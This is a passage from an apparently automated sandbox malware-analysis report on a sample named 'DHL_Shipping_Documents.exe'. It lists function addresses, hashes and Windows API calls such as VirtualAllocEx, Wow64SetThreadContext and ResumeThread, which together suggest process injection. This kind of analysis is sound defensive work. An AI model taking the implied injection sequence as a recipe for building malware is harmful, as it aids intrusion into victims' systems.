Opcode ID: de2825fa8bd386516056ef43151703e4eb36c85f62e7e8784f743750e7fe8bfa
Instruction ID: 546928dd10ba3ca525f73a8e5e2d90c4df8c53f7bbb73953a4bfa9cff4cc2e87
Opcode Fuzzy Hash: de2825fa8bd386516056ef43151703e4eb36c85f62e7e8784f743750e7fe8bfa
Instruction Fuzzy Hash: AA212A719003899FCB10CFA9C985BDEBBF5FF48310F148429E919A7341D7789945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7F81 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05BE8008

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 074d4b0e57043587f02e2fb2fd488998dc0a740756bfcbb465910be6cfa754fc
Instruction ID: 7f980dfb69cb42be98605c36260ae56584c2126f55156cb40edb163f446f61b9
Opcode Fuzzy Hash: 074d4b0e57043587f02e2fb2fd488998dc0a740756bfcbb465910be6cfa754fc
Instruction Fuzzy Hash: 692139B1800649DFCB10CF9AC980ADEBBF5FF48310F148429E519A7351D7389945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7A9C Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BE7B1E

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eec9919bdd999c10ee173a5755023c93bb6cc8075344589929ff21f4be914501
Instruction ID: f9feb0f11812bfc952331eaafe581b3d1b439f3b3faa9d35352c9a4eeffff079
Opcode Fuzzy Hash: eec9919bdd999c10ee173a5755023c93bb6cc8075344589929ff21f4be914501
Instruction Fuzzy Hash: 202159719002498FDB10CFAAC5857EEBBF4EF88310F148429D419A7341CB78A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 015ED649 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6D7

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7ea9f013a4e41afc8fcbf8007e7249e78afb3d515627fb64d73a2c074a350901
Instruction ID: d679c167df298ac25b8e9495aec891b320cdaddaab010a6c52a6ba28d8567111
Opcode Fuzzy Hash: 7ea9f013a4e41afc8fcbf8007e7249e78afb3d515627fb64d73a2c074a350901
Instruction Fuzzy Hash: 432114B5D002489FDB10CFAAD585AEEBFF4FB48310F24841AE918A7310C374A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7F88 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05BE8008

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eef0fc945757820e83a32ab221ce27cc6dca3118cd6c285565883ae6a5c12b4d
Instruction ID: d489d6f0c03497b8dba59a93971c0e6d08b9bde93e76235d8f459edcf35cb7dc
Opcode Fuzzy Hash: eef0fc945757820e83a32ab221ce27cc6dca3118cd6c285565883ae6a5c12b4d
Instruction Fuzzy Hash: FD2139B1C006499FCB10CFAAC985ADEFBF5FF48310F14842AE519A7341D7789945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7AA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BE7B1E

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7b35f74c8d59a961d892da363493d8fa979c13b07901700c3c91318b845545e9
Instruction ID: ec87e08544ca5878f4666e4a928d3f421b1ced7bb1021482986695c5e725022a
Opcode Fuzzy Hash: 7b35f74c8d59a961d892da363493d8fa979c13b07901700c3c91318b845545e9
Instruction Fuzzy Hash: 8A213871D002498FDB10CFAAC5857AEBBF4EF48314F14842AD519A7341DB78A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015ED650 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6D7

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 784666f7763defd44a9fef1459a435f946c81bbafb32c9eaa0fc60a52f334f52
Instruction ID: 1fdb71355e148f106ab583664a260dd319389cb56e1b8f141bb1b27efcc1dedd
Opcode Fuzzy Hash: 784666f7763defd44a9fef1459a435f946c81bbafb32c9eaa0fc60a52f334f52
Instruction Fuzzy Hash: 6F21C4B5D012489FDB10CF9AD584ADEBFF8FB48310F14841AE918A7350D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7DD0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BE7E46

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a143359d01099ace0573e13c6cd5244a40bddc896df849736b7c2ec855e6097
Instruction ID: 809fe7bf8ded851853bc2b3ad5b8e89992a98d26019e700b59f1b0ba359337d6
Opcode Fuzzy Hash: 2a143359d01099ace0573e13c6cd5244a40bddc896df849736b7c2ec855e6097
Instruction Fuzzy Hash: F82147728002499FCB14DFAAC945ADFBFF5EF88310F24881AE515A7350CB35A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015EA108 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB039,00000800,00000000,00000000), ref: 015EB24A

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 912a4227b62b11ed2443c48798d894f703c382bdded056e6d76378d6d03fec80
Instruction ID: ed3c24a24b4b482221a437a92501156c71a06f50d20d4f8b2f11652d6642d536
Opcode Fuzzy Hash: 912a4227b62b11ed2443c48798d894f703c382bdded056e6d76378d6d03fec80
Instruction Fuzzy Hash: 791114B6D002499FDB14CF9AD448A9EFBF4FF48310F10842AE519AB300C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015EB1D9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB039,00000800,00000000,00000000), ref: 015EB24A

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 841bd079fbab45d0f8aa87d9ee53a69fb02fc4cd9cd647ae4e43201a9c5f3cf5
Instruction ID: 0ec38d0094bcbe1787c2153b1206f2b8066a09968d389cdd059883fa0a935aff
Opcode Fuzzy Hash: 841bd079fbab45d0f8aa87d9ee53a69fb02fc4cd9cd647ae4e43201a9c5f3cf5
Instruction Fuzzy Hash: 6111F4B5D002498FDB24CFAAD484ADEBBF4EF48310F14841AE519A7600C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05BE79ED Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05BE7A52

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e11b4c1c336680ed4cf847b8b15b2108946aea2401cb78cc6c4021b5ff96a746
Instruction ID: dd7ee08fce07f97a49d5fc1db9fa84fbbdb91a8a09b79d79b348cbb79f383ac8
Opcode Fuzzy Hash: e11b4c1c336680ed4cf847b8b15b2108946aea2401cb78cc6c4021b5ff96a746
Instruction Fuzzy Hash: 40116AB1D002888FCB20DFAAC54579EFBF4EF88310F248419D519A7340CB34A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05623E88 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,05625941,?,?), ref: 05625AE8

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8def392d00a69e4f665b919425a58f321bffcd61e4543a0b614e4fcdfc1e3db0
Instruction ID: 6bb241920769d16b49690a2bcacf887069296325361c00562e4f379746062bba
Opcode Fuzzy Hash: 8def392d00a69e4f665b919425a58f321bffcd61e4543a0b614e4fcdfc1e3db0
Instruction Fuzzy Hash: B2116AB18007498FCB20CF99C585BDEBBF4EB48320F108419E519A7340D738A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BE79F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05BE7A52

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5ce07101f01d268a52dffdf6a8b48b9faba20a47e5f41c93c5e93730903dff5b
Instruction ID: 40257cab07e05a5d5909366dae34cec1ca95755e151fd923797c71bd907f08cb
Opcode Fuzzy Hash: 5ce07101f01d268a52dffdf6a8b48b9faba20a47e5f41c93c5e93730903dff5b
Instruction Fuzzy Hash: 57113AB1D002888FDB20DFAAC54579EFBF4EF88314F248419D519A7340CB75A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05625A88 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,05625941,?,?), ref: 05625AE8

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0241d89729eba3fcf094d75ff84f5e87abd19028ce2872518d2fda8d8849c85e
Instruction ID: bc9d8a99d913d7415296f296849f813ba3d37d346e9b28e6b2be3009e876e149
Opcode Fuzzy Hash: 0241d89729eba3fcf094d75ff84f5e87abd19028ce2872518d2fda8d8849c85e
Instruction Fuzzy Hash: 61113AB58006498FCB20CF99D545BDEBBF4EF48320F24841AE959A7741D738A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015EAF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EAFBE

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f913634c4192dd6317827cff36191c56bf0121128f815c7d1deed592efcf95f8
Instruction ID: 1ccb9954ee0e507eeeff37045c54a0e43cecd31d4251a14640731bd6e111f2f0
Opcode Fuzzy Hash: f913634c4192dd6317827cff36191c56bf0121128f815c7d1deed592efcf95f8
Instruction Fuzzy Hash: 28113FB5C002488FDB14CFAAC448ACEFBF4AB88314F10841AD428A7700C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05BE9209 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BE926D

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: eb2b8e84560365f7454edddf11c7751aa7d5e9c5923dc4c6c35986a7e7dc63df
Instruction ID: c21c8d49cf8cdeaf5eb53ca34ea3afb5c477d83bf76c656593faea11446c648c
Opcode Fuzzy Hash: eb2b8e84560365f7454edddf11c7751aa7d5e9c5923dc4c6c35986a7e7dc63df
Instruction Fuzzy Hash: 7F1103B58002499FCB20DF9AD585BDEBFF8FB48310F248459E958A7311C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05BE9210 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BE926D

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ae6190d5618ab63d14b99f70e6ea895b24c0a5cf190f2ecbc354fb50a807802b
Instruction ID: e63bb138d934347c88a0a0b7741689fa13f1a26236ceeef4868fb67b25f2d8a0
Opcode Fuzzy Hash: ae6190d5618ab63d14b99f70e6ea895b24c0a5cf190f2ecbc354fb50a807802b
Instruction Fuzzy Hash: 9E1103B58002489FCB10CF9AD585BDEBBF8FB48310F148459E518A3300C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 012FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8862d9c3b5b80ddea068d35222f43f3917c313c418da7c74d412fde53dcce28c
Instruction ID: c907cdd6feccdae5d191f8ffd1f173a7d01f5e5c5dcb5339beb1582e6df29d3a
Opcode Fuzzy Hash: 8862d9c3b5b80ddea068d35222f43f3917c313c418da7c74d412fde53dcce28c
Instruction Fuzzy Hash: 68210071510248DFDB15DF98E9C4B26FF65FB88318F20C57DEA090B256C33AD456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 012FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7585a1d273eacc2e5b8ed20f7798f55ceae54bac32cb39d7af3d084c8a4fd79
Instruction ID: d18bad9e2e2563f820882ac512756d5c151b1fab5ea2f24c4a2e00c26c1ac176
Opcode Fuzzy Hash: c7585a1d273eacc2e5b8ed20f7798f55ceae54bac32cb39d7af3d084c8a4fd79
Instruction Fuzzy Hash: 4221F175510248DFDB05DF98D9C0B56FB65FB88324F20C17DEA090B256C33AE456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0130D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992389202.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130d000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15873467d6fc6734ece2e774075f9babfa30a07af00974cfe1f7a4f759e6c8c
Instruction ID: f6eb0c2337d933156af98e5a8ab8c3271670a3fda15d647be7cad9bf6db3db1f
Opcode Fuzzy Hash: f15873467d6fc6734ece2e774075f9babfa30a07af00974cfe1f7a4f759e6c8c
Instruction Fuzzy Hash: 34210471504244EFDB06DFD8D9D0B26BBE9FB84328F20C56DE9094B396C33AD446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0130D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992389202.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130d000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6204ac93e2a8c08cb7bce0c446448c581d892d80c245c45a0f0c322b8a5c0fa1
Instruction ID: 1d9e58da5611761b0e4e438bcb1e84fc25ac661b24d80cad413645457a354479
Opcode Fuzzy Hash: 6204ac93e2a8c08cb7bce0c446448c581d892d80c245c45a0f0c322b8a5c0fa1
Instruction Fuzzy Hash: 1C210071604244DFDB16DF98D990B16BBE5EB84318F20C56DE80E4B786C33AD407CA61

Uniqueness

Uniqueness Score: -1.00%

Function 012FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3db157a7212b95c3a66f5f945617128eafa109d7c72cc9a85f4b733a003300c
Instruction ID: ac90ae5036bdddd6ebb6146a0549f9bc275fae8bcaac068bdff86f142ddda27e
Opcode Fuzzy Hash: a3db157a7212b95c3a66f5f945617128eafa109d7c72cc9a85f4b733a003300c
Instruction Fuzzy Hash: 4411CD76404284CFDB12CF54D5C4B16BF71FB84214F2486ADDA090B256C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 012FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3db157a7212b95c3a66f5f945617128eafa109d7c72cc9a85f4b733a003300c
Instruction ID: 289531f503e4081f22425c247244146f527bf27db86a0775622ab4174b2f749d
Opcode Fuzzy Hash: a3db157a7212b95c3a66f5f945617128eafa109d7c72cc9a85f4b733a003300c
Instruction Fuzzy Hash: 5511CA76404284CFDB02CF44D9C0B56BF72FB84224F2482ADDA090A656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0130D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992389202.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130d000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb49d3db99f07284c6cf35c1c84e8fe8e03c7b78b7f429b687e09de8b06e552
Instruction ID: 72b523919e51ed8468fa86e9c20de11d17a67f951e9e3b94c00fd77cd9d89ec8
Opcode Fuzzy Hash: 9bb49d3db99f07284c6cf35c1c84e8fe8e03c7b78b7f429b687e09de8b06e552
Instruction Fuzzy Hash: 9311BE75504280CFDB12CF54D5D4B15BBA1FB44318F24C6AAD8094B696C33AD40ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0130D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992389202.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130d000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb49d3db99f07284c6cf35c1c84e8fe8e03c7b78b7f429b687e09de8b06e552
Instruction ID: bdfae2e06c95e293f2926840c5d980e4bbc9cd283c76c0e2939b7f4bf1744b0e
Opcode Fuzzy Hash: 9bb49d3db99f07284c6cf35c1c84e8fe8e03c7b78b7f429b687e09de8b06e552
Instruction Fuzzy Hash: DC11BB75504280DFDB02CF98C5D0B15BBB1FB84228F24C6AED8494B696C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 012FD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a3b5cf7888df2d6c7b38d7df6c9972b9aad3633decffcaa51c1dd51e18601f
Instruction ID: 83d49943868ccb8cecf84afef0d25703e4545d3244a0bcf91e64d53331f1c850
Opcode Fuzzy Hash: 72a3b5cf7888df2d6c7b38d7df6c9972b9aad3633decffcaa51c1dd51e18601f
Instruction Fuzzy Hash: 520126310143889AE7255EA9CD84B27FF98DF45324F18C53EEF181F286D2799801CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 012FD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992354586.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4547ac227f1d15e58eb7b7458f263f406f949a56805fa5adc06c66998efc1a
Instruction ID: d823befe7467e556500e68f76e87e52f531e9fb405a8088a141819b2fcab54d2
Opcode Fuzzy Hash: 6d4547ac227f1d15e58eb7b7458f263f406f949a56805fa5adc06c66998efc1a
Instruction Fuzzy Hash: 37F0C2314043889EE7158E19CC88B63FFA8EB81734F18C46AEE080E297C2799845CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0562BE58 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef9d345fac6269e3856320a1a72f169ba3fb69fd238a162701b373bd18fb6a7
Instruction ID: b0e7d5e120c8634a0e4ff8a37cb0d5dcc13cb7486b302a87cdd211bf316cfbcd
Opcode Fuzzy Hash: cef9d345fac6269e3856320a1a72f169ba3fb69fd238a162701b373bd18fb6a7
Instruction Fuzzy Hash: 15A180757001149FDB58A7BC882876F6AA7AFC8340F25853C910AEB7C4DE389D078BA5

Uniqueness

Uniqueness Score: -1.00%

Function 05BE15D0 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6705e7bd4036e718a59b0b8b264f61e32196380923ea132aacc96c7435996e
Instruction ID: c04517e94e5da6890bb22c91f4c19c7dda843b10c989dd07ea344d7c16baeb7e
Opcode Fuzzy Hash: ac6705e7bd4036e718a59b0b8b264f61e32196380923ea132aacc96c7435996e
Instruction Fuzzy Hash: 62D1A374A006048FDB14DF69C598AA9B7F2FF4D701F2A80E9E416AB361DB31AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 015ED3C4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f86faef101162c70fb92909a8d78e64d79c959e018c513aecd0f3e0d267b9b
Instruction ID: 5c3e3631968f8d3e3bf1f8dfff7daee5bd8466e8cbf01c516e579d283d981dd5
Opcode Fuzzy Hash: d1f86faef101162c70fb92909a8d78e64d79c959e018c513aecd0f3e0d267b9b
Instruction Fuzzy Hash: 0DA14C36E002168FCF19DFB4C84459EBBF2BF84300B15856AE906AF265DF71E916CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DHL_Shipping_Documents.exePID: 1360, Parent PID: 4496COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.7%
Total number of Nodes:	558
Total number of Limit Nodes:	68

Executed Functions

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: 28153973c837d57395c9adaba28ef5860802cb5b45de2bbc2a01750c74bae7ac
Instruction ID: 4b401066e830932fefde3734bec42ddcee3efefc39e068c256203ea17878e4d8
Opcode Fuzzy Hash: 28153973c837d57395c9adaba28ef5860802cb5b45de2bbc2a01750c74bae7ac
Instruction Fuzzy Hash: 860169B2200108ABCB14CF99DC85DDB7BADEF8C754F058248FA0D97241CA30E8128BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

